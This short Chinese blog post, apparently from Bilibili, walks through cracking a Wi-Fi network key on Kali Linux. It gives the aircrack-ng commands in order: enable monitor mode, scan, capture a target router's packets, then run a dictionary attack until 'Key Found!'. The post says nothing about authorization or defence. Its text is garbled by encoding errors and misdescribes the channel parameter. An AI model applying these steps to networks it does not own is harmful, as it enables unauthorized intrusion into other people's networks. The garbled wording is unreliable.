如何使用Kali Linux破譯無線網(wǎng)絡(luò)密匙
2023-08-23 15:45 作者:bili_1038694253 | 我要投稿
*將"無線網(wǎng)卡"連接至Kali Linux。* 1.檢測(cè)"無線網(wǎng)卡"能否支持"偵聽": airmon-ng 2.啟用"偵聽": airmon-ng start wlan0 3.檢測(cè)"無線網(wǎng)絡(luò)信號(hào)": airodump-ng wlan0 *Ctrl+C停止檢測(cè)。* 4.偵聽以獲取"無線網(wǎng)絡(luò)數(shù)據(jù)包": airodump-ng -c *Ch* --bssid *Bssid* -w hach wlan0 *"Bssid":"Router"的Mac地址。"Station":設(shè)備的Mac地址。"Ch":信號(hào)傳輸?shù)拿浇椤? 5.破譯"無線網(wǎng)絡(luò)數(shù)據(jù)包": aircrack-ng -w *"密碼字典"路徑* *截獲"無線網(wǎng)絡(luò)數(shù)據(jù)包"保存路徑* 運(yùn)行,Key Found!
標(biāo)簽: